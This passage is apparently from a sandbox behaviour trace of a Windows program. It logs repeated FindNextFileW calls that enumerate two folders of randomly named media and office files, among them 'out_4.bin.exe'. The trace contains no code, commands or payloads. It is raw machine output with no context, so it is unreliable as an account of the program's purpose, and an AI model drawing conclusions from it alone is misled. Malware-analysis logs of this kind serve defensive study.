cFileName="BvB-.pptx", cAlternateFileName="BVB-~1.PPT")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7f69830, ftCreationTime.dwHighDateTime=0x1d8be44, ftLastAccessTime.dwLowDateTime=0xc6e05420, ftLastAccessTime.dwHighDateTime=0x1d8be6e, ftLastWriteTime.dwLowDateTime=0xc6e05420, ftLastWriteTime.dwHighDateTime=0x1d8be6e, nFileSizeHigh=0x0, nFileSizeLow=0x159be, dwReserved0=0x0, dwReserved1=0x0, cFileName="co1l3mz6I3A.avi", cAlternateFileName="CO1L3M~1.AVI")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3a360, ftCreationTime.dwHighDateTime=0x1d8bbf5, ftLastAccessTime.dwLowDateTime=0x80177720, ftLastAccessTime.dwHighDateTime=0x1d8bf50, ftLastWriteTime.dwLowDateTime=0x80177720, ftLastWriteTime.dwHighDateTime=0x1d8bf50, nFileSizeHigh=0x0, nFileSizeLow=0x14f88, dwReserved0=0x0, dwReserved1=0x0, cFileName="cp1StchTMg.ppt", cAlternateFileName="CP1STC~1.PPT")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca13c7b0, ftCreationTime.dwHighDateTime=0x1d8be98, ftLastAccessTime.dwLowDateTime=0x83c74e10, ftLastAccessTime.dwHighDateTime=0x1d8beb3, ftLastWriteTime.dwLowDateTime=0x83c74e10, ftLastWriteTime.dwHighDateTime=0x1d8beb3, nFileSizeHigh=0x0, nFileSizeLow=0x162db, dwReserved0=0x0, dwReserved1=0x0, cFileName="cRVv3tpAH5GPO.bmp", cAlternateFileName="CRVV3T~1.BMP")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd8c9710, ftCreationTime.dwHighDateTime=0x1d8b12c, ftLastAccessTime.dwLowDateTime=0x201d7f30, ftLastAccessTime.dwHighDateTime=0x1d8b853, ftLastWriteTime.dwLowDateTime=0x201d7f30, ftLastWriteTime.dwHighDateTime=0x1d8b853, nFileSizeHigh=0x0, nFileSizeLow=0xa006, dwReserved0=0x0, dwReserved1=0x0, cFileName="d2XMr.rtf", cAlternateFileName="")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9fc580, ftCreationTime.dwHighDateTime=0x1d8c02e, ftLastAccessTime.dwLowDateTime=0xf36c8300, ftLastAccessTime.dwHighDateTime=0x1d8c0b8, ftLastWriteTime.dwLowDateTime=0xf36c8300, ftLastWriteTime.dwHighDateTime=0x1d8c0b8, nFileSizeHigh=0x0, nFileSizeLow=0x9f6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dBXn0V8NDoRI1v6t.jpg", cAlternateFileName="DBXN0V~1.JPG")) returned 1 [0165.901] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.901] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a35cb90, ftCreationTime.dwHighDateTime=0x1d8b210, ftLastAccessTime.dwLowDateTime=0x67c5c720, ftLastAccessTime.dwHighDateTime=0x1d8b439, ftLastWriteTime.dwLowDateTime=0x67c5c720, ftLastWriteTime.dwHighDateTime=0x1d8b439, nFileSizeHigh=0x0, nFileSizeLow=0xbae2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ds26r N.swf", cAlternateFileName="DS26RN~1.SWF")) returned 1 [0165.901] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac4760, ftCreationTime.dwHighDateTime=0x1d8bb04, ftLastAccessTime.dwLowDateTime=0xd74335d0, ftLastAccessTime.dwHighDateTime=0x1d8bc3e, ftLastWriteTime.dwLowDateTime=0xd74335d0, ftLastWriteTime.dwHighDateTime=0x1d8bc3e, nFileSizeHigh=0x0, nFileSizeLow=0x17794, dwReserved0=0x0, dwReserved1=0x0, cFileName="eLYNMAkF_-Jc2al.wav", cAlternateFileName="ELYNMA~1.WAV")) returned 1 [0165.901] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x214809d0, ftCreationTime.dwHighDateTime=0x1d8bca3, ftLastAccessTime.dwLowDateTime=0x3319b560, ftLastAccessTime.dwHighDateTime=0x1d8bf63, ftLastWriteTime.dwLowDateTime=0x3319b560, ftLastWriteTime.dwHighDateTime=0x1d8bf63, nFileSizeHigh=0x0, nFileSizeLow=0x18d4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="FkRqOLPio4.mp4", cAlternateFileName="FKRQOL~1.MP4")) returned 1 [0165.901] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45eb99b0, ftCreationTime.dwHighDateTime=0x1d8b7ed, ftLastAccessTime.dwLowDateTime=0x8d322560, ftLastAccessTime.dwHighDateTime=0x1d8bf12, ftLastWriteTime.dwLowDateTime=0x8d322560, ftLastWriteTime.dwHighDateTime=0x1d8bf12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FnStQZfb tK", cAlternateFileName="FNSTQZ~1")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64945c20, ftCreationTime.dwHighDateTime=0x1d8bb72, ftLastAccessTime.dwLowDateTime=0x87a0c9a0, ftLastAccessTime.dwHighDateTime=0x1d8c122, ftLastWriteTime.dwLowDateTime=0x87a0c9a0, ftLastWriteTime.dwHighDateTime=0x1d8c122, nFileSizeHigh=0x0, nFileSizeLow=0x18169, dwReserved0=0x0, dwReserved1=0x0, cFileName="j3wu Z087CIq1FGG.jpg", cAlternateFileName="J3WUZ0~1.JPG")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a234a00, ftCreationTime.dwHighDateTime=0x1d8bcc2, ftLastAccessTime.dwLowDateTime=0x73078c0, ftLastAccessTime.dwHighDateTime=0x1d8be83, ftLastWriteTime.dwLowDateTime=0x73078c0, ftLastWriteTime.dwHighDateTime=0x1d8be83, nFileSizeHigh=0x0, nFileSizeLow=0x584d, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8Z eSPW5awz.avi", cAlternateFileName="K8ZESP~1.AVI")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59241110, ftCreationTime.dwHighDateTime=0x1d8c067, ftLastAccessTime.dwLowDateTime=0x1f03f200, ftLastAccessTime.dwHighDateTime=0x1d8c0dc, ftLastWriteTime.dwLowDateTime=0x1f03f200, ftLastWriteTime.dwHighDateTime=0x1d8c0dc, nFileSizeHigh=0x0, nFileSizeLow=0x6dc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="n8gErgbitw0kdbzycb.png", cAlternateFileName="N8GERG~1.PNG")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4fc77e0, ftCreationTime.dwHighDateTime=0x1d8bad0, ftLastAccessTime.dwLowDateTime=0x3f9d37f0, ftLastAccessTime.dwHighDateTime=0x1d8bb9c, ftLastWriteTime.dwLowDateTime=0x3f9d37f0, ftLastWriteTime.dwHighDateTime=0x1d8bb9c, nFileSizeHigh=0x0, nFileSizeLow=0x6b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="njrt9sJ.odt", cAlternateFileName="")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9930f530, ftCreationTime.dwHighDateTime=0x1d8b585, ftLastAccessTime.dwLowDateTime=0xeb3762a0, ftLastAccessTime.dwHighDateTime=0x1d8bb21, ftLastWriteTime.dwLowDateTime=0xeb3762a0, ftLastWriteTime.dwHighDateTime=0x1d8bb21, nFileSizeHigh=0x0, nFileSizeLow=0x15789, dwReserved0=0x0, dwReserved1=0x0, cFileName="oHD3Y9.jpg", cAlternateFileName="")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23938f00, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x242c2580, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x492fe00, ftLastWriteTime.dwHighDateTime=0x1d94ef0, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="out_4.bin.exe", cAlternateFileName="OUT_4B~1.EXE")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x315ede00, ftCreationTime.dwHighDateTime=0x1d8b5f7, ftLastAccessTime.dwLowDateTime=0x3307e8e0, ftLastAccessTime.dwHighDateTime=0x1d8b9c2, ftLastWriteTime.dwLowDateTime=0x3307e8e0, ftLastWriteTime.dwHighDateTime=0x1d8b9c2, nFileSizeHigh=0x0, nFileSizeLow=0x4c0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="p sQcfqaLUL4KbJT __4.mp3", cAlternateFileName="PSQCFQ~1.MP3")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61b9d7c0, ftCreationTime.dwHighDateTime=0x1d8b747, ftLastAccessTime.dwLowDateTime=0x25175800, ftLastAccessTime.dwHighDateTime=0x1d8b987, ftLastWriteTime.dwLowDateTime=0x25175800, ftLastWriteTime.dwHighDateTime=0x1d8b987, nFileSizeHigh=0x0, nFileSizeLow=0x2b3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="p8mE06ilb_q.png", cAlternateFileName="P8ME06~1.PNG")) returned 1 [0165.902] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa6e42b0, ftCreationTime.dwHighDateTime=0x1d8b555, ftLastAccessTime.dwLowDateTime=0xe9f21ba0, ftLastAccessTime.dwHighDateTime=0x1d8bef6, ftLastWriteTime.dwLowDateTime=0xe9f21ba0, ftLastWriteTime.dwHighDateTime=0x1d8bef6, nFileSizeHigh=0x0, nFileSizeLow=0x2ac5, dwReserved0=0x0, dwReserved1=0x0, cFileName="s8ohLOQq4wxVIuURP30V.mp3", cAlternateFileName="S8OHLO~1.MP3")) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e63bf0, ftCreationTime.dwHighDateTime=0x1d8c072, ftLastAccessTime.dwLowDateTime=0xb8fb3480, ftLastAccessTime.dwHighDateTime=0x1d8c11e, ftLastWriteTime.dwLowDateTime=0xb8fb3480, ftLastWriteTime.dwHighDateTime=0x1d8c11e, nFileSizeHigh=0x0, nFileSizeLow=0x2ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tw6RboHV38xltxRe2.mp3", cAlternateFileName="TW6RBO~1.MP3")) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x300c3db0, ftCreationTime.dwHighDateTime=0x1d8b1c2, ftLastAccessTime.dwLowDateTime=0xd6b7af20, ftLastAccessTime.dwHighDateTime=0x1d8bee5, ftLastWriteTime.dwLowDateTime=0xd6b7af20, ftLastWriteTime.dwHighDateTime=0x1d8bee5, nFileSizeHigh=0x0, nFileSizeLow=0x71d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZDm2HZN0 RK g6UC1V.flv", cAlternateFileName="ZDM2HZ~1.FLV")) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73754d10, ftCreationTime.dwHighDateTime=0x1d8b863, ftLastAccessTime.dwLowDateTime=0x9f524660, ftLastAccessTime.dwHighDateTime=0x1d8c022, ftLastWriteTime.dwLowDateTime=0x9f524660, ftLastWriteTime.dwHighDateTime=0x1d8c022, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZHH2yPigffKt.m4a", cAlternateFileName="ZHH2YP~1.M4A")) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a63a0, ftCreationTime.dwHighDateTime=0x1d8b542, ftLastAccessTime.dwLowDateTime=0x3494b290, ftLastAccessTime.dwHighDateTime=0x1d8c095, ftLastWriteTime.dwLowDateTime=0x3494b290, ftLastWriteTime.dwHighDateTime=0x1d8c095, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uyDWF2R_p-YxX_WKj8k.ots", cAlternateFileName="_UYDWF~1.OTS")) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a63a0, ftCreationTime.dwHighDateTime=0x1d8b542, ftLastAccessTime.dwLowDateTime=0x3494b290, ftLastAccessTime.dwHighDateTime=0x1d8c095, ftLastWriteTime.dwLowDateTime=0x3494b290, ftLastWriteTime.dwHighDateTime=0x1d8c095, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uyDWF2R_p-YxX_WKj8k.ots", cAlternateFileName="_UYDWF~1.OTS")) returned 0 [0165.903] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e304) returned 1 [0165.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e564) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x40d1e300, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x40d1e300, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.903] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32dc4300, ftCreationTime.dwHighDateTime=0x1d8c12b, ftLastAccessTime.dwLowDateTime=0x8a79ee60, ftLastAccessTime.dwHighDateTime=0x1d8c12f, ftLastWriteTime.dwLowDateTime=0x8a79ee60, ftLastWriteTime.dwHighDateTime=0x1d8c12f, nFileSizeHigh=0x0, nFileSizeLow=0x12aaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="0KhdgvCwY.jpg", cAlternateFileName="0KHDGV~1.JPG")) returned 1 [0165.904] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f08350, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0xe22c9210, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0xe22c9210, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x67cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5tfgYd 5zBc5i_nbR.xls", cAlternateFileName="5TFGYD~1.XLS")) returned 1 [0165.904] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900e9080, ftCreationTime.dwHighDateTime=0x1d8c006, ftLastAccessTime.dwLowDateTime=0x5003d310, ftLastAccessTime.dwHighDateTime=0x1d8c0d3, ftLastWriteTime.dwLowDateTime=0x5003d310, ftLastWriteTime.dwHighDateTime=0x1d8c0d3, nFileSizeHigh=0x0, nFileSizeLow=0x104a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="7hf9.wav", cAlternateFileName="")) returned 1 [0165.905] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de03b20, ftCreationTime.dwHighDateTime=0x1d8b273, ftLastAccessTime.dwLowDateTime=0x19bb6660, ftLastAccessTime.dwHighDateTime=0x1d8b507, ftLastWriteTime.dwLowDateTime=0x19bb6660, ftLastWriteTime.dwHighDateTime=0x1d8b507, nFileSizeHigh=0x0, nFileSizeLow=0x156d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8T4n_1qLOLjxL90.bmp", cAlternateFileName="8T4N_1~1.BMP")) returned 1 [0165.905] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f3c980, ftCreationTime.dwHighDateTime=0x1d8b413, ftLastAccessTime.dwLowDateTime=0x36bfa680, ftLastAccessTime.dwHighDateTime=0x1d8bb7f, ftLastWriteTime.dwLowDateTime=0x36bfa680, ftLastWriteTime.dwHighDateTime=0x1d8bb7f, nFileSizeHigh=0x0, nFileSizeLow=0x8ec6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BvB-.pptx", cAlternateFileName="BVB-~1.PPT")) returned 1 [0165.905] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7f69830, ftCreationTime.dwHighDateTime=0x1d8be44, ftLastAccessTime.dwLowDateTime=0xc6e05420, ftLastAccessTime.dwHighDateTime=0x1d8be6e, ftLastWriteTime.dwLowDateTime=0xc6e05420, ftLastWriteTime.dwHighDateTime=0x1d8be6e, nFileSizeHigh=0x0, nFileSizeLow=0x159be, dwReserved0=0x0, dwReserved1=0x0, cFileName="co1l3mz6I3A.avi", cAlternateFileName="CO1L3M~1.AVI")) returned 1 [0165.906] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3a360, ftCreationTime.dwHighDateTime=0x1d8bbf5, ftLastAccessTime.dwLowDateTime=0x80177720, ftLastAccessTime.dwHighDateTime=0x1d8bf50, ftLastWriteTime.dwLowDateTime=0x80177720, ftLastWriteTime.dwHighDateTime=0x1d8bf50, nFileSizeHigh=0x0, nFileSizeLow=0x14f88, dwReserved0=0x0, dwReserved1=0x0, cFileName="cp1StchTMg.ppt", cAlternateFileName="CP1STC~1.PPT")) returned 1 [0165.906] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca13c7b0, ftCreationTime.dwHighDateTime=0x1d8be98, ftLastAccessTime.dwLowDateTime=0x83c74e10, ftLastAccessTime.dwHighDateTime=0x1d8beb3, ftLastWriteTime.dwLowDateTime=0x83c74e10, ftLastWriteTime.dwHighDateTime=0x1d8beb3, nFileSizeHigh=0x0, nFileSizeLow=0x162db, dwReserved0=0x0, dwReserved1=0x0, cFileName="cRVv3tpAH5GPO.bmp", cAlternateFileName="CRVV3T~1.BMP")) returned 1 [0165.906] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd8c9710, ftCreationTime.dwHighDateTime=0x1d8b12c, ftLastAccessTime.dwLowDateTime=0x201d7f30, ftLastAccessTime.dwHighDateTime=0x1d8b853, ftLastWriteTime.dwLowDateTime=0x201d7f30, ftLastWriteTime.dwHighDateTime=0x1d8b853, nFileSizeHigh=0x0, nFileSizeLow=0xa006, dwReserved0=0x0, dwReserved1=0x0, cFileName="d2XMr.rtf", cAlternateFileName="")) returned 1 [0165.906] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9fc580, ftCreationTime.dwHighDateTime=0x1d8c02e, ftLastAccessTime.dwLowDateTime=0xf36c8300, ftLastAccessTime.dwHighDateTime=0x1d8c0b8, ftLastWriteTime.dwLowDateTime=0xf36c8300, ftLastWriteTime.dwHighDateTime=0x1d8c0b8, nFileSizeHigh=0x0, nFileSizeLow=0x9f6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dBXn0V8NDoRI1v6t.jpg", cAlternateFileName="DBXN0V~1.JPG")) returned 1 [0165.907] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.907] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a35cb90, ftCreationTime.dwHighDateTime=0x1d8b210, ftLastAccessTime.dwLowDateTime=0x67c5c720, ftLastAccessTime.dwHighDateTime=0x1d8b439, ftLastWriteTime.dwLowDateTime=0x67c5c720, ftLastWriteTime.dwHighDateTime=0x1d8b439, nFileSizeHigh=0x0, nFileSizeLow=0xbae2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ds26r N.swf", cAlternateFileName="DS26RN~1.SWF")) returned 1 [0165.907] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac4760, ftCreationTime.dwHighDateTime=0x1d8bb04, ftLastAccessTime.dwLowDateTime=0xd74335d0, ftLastAccessTime.dwHighDateTime=0x1d8bc3e, ftLastWriteTime.dwLowDateTime=0xd74335d0, ftLastWriteTime.dwHighDateTime=0x1d8bc3e, nFileSizeHigh=0x0, nFileSizeLow=0x17794, dwReserved0=0x0, dwReserved1=0x0, cFileName="eLYNMAkF_-Jc2al.wav", cAlternateFileName="ELYNMA~1.WAV")) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x214809d0, ftCreationTime.dwHighDateTime=0x1d8bca3, ftLastAccessTime.dwLowDateTime=0x3319b560, ftLastAccessTime.dwHighDateTime=0x1d8bf63, ftLastWriteTime.dwLowDateTime=0x3319b560, ftLastWriteTime.dwHighDateTime=0x1d8bf63, nFileSizeHigh=0x0, nFileSizeLow=0x18d4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="FkRqOLPio4.mp4", cAlternateFileName="FKRQOL~1.MP4")) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45eb99b0, ftCreationTime.dwHighDateTime=0x1d8b7ed, ftLastAccessTime.dwLowDateTime=0x8d322560, ftLastAccessTime.dwHighDateTime=0x1d8bf12, ftLastWriteTime.dwLowDateTime=0x8d322560, ftLastWriteTime.dwHighDateTime=0x1d8bf12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FnStQZfb tK", cAlternateFileName="FNSTQZ~1")) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64945c20, ftCreationTime.dwHighDateTime=0x1d8bb72, ftLastAccessTime.dwLowDateTime=0x87a0c9a0, ftLastAccessTime.dwHighDateTime=0x1d8c122, ftLastWriteTime.dwLowDateTime=0x87a0c9a0, ftLastWriteTime.dwHighDateTime=0x1d8c122, nFileSizeHigh=0x0, nFileSizeLow=0x18169, dwReserved0=0x0, dwReserved1=0x0, cFileName="j3wu Z087CIq1FGG.jpg", cAlternateFileName="J3WUZ0~1.JPG")) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a234a00, ftCreationTime.dwHighDateTime=0x1d8bcc2, ftLastAccessTime.dwLowDateTime=0x73078c0, ftLastAccessTime.dwHighDateTime=0x1d8be83, ftLastWriteTime.dwLowDateTime=0x73078c0, ftLastWriteTime.dwHighDateTime=0x1d8be83, nFileSizeHigh=0x0, nFileSizeLow=0x584d, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8Z eSPW5awz.avi", cAlternateFileName="K8ZESP~1.AVI")) returned 1 [0165.909] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59241110, ftCreationTime.dwHighDateTime=0x1d8c067, ftLastAccessTime.dwLowDateTime=0x1f03f200, ftLastAccessTime.dwHighDateTime=0x1d8c0dc, ftLastWriteTime.dwLowDateTime=0x1f03f200, ftLastWriteTime.dwHighDateTime=0x1d8c0dc, nFileSizeHigh=0x0, nFileSizeLow=0x6dc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="n8gErgbitw0kdbzycb.png", cAlternateFileName="N8GERG~1.PNG")) returned 1 [0165.909] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4fc77e0, ftCreationTime.dwHighDateTime=0x1d8bad0, ftLastAccessTime.dwLowDateTime=0x3f9d37f0, ftLastAccessTime.dwHighDateTime=0x1d8bb9c, ftLastWriteTime.dwLowDateTime=0x3f9d37f0, ftLastWriteTime.dwHighDateTime=0x1d8bb9c, nFileSizeHigh=0x0, nFileSizeLow=0x6b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="njrt9sJ.odt", cAlternateFileName="")) returned 1 [0165.910] 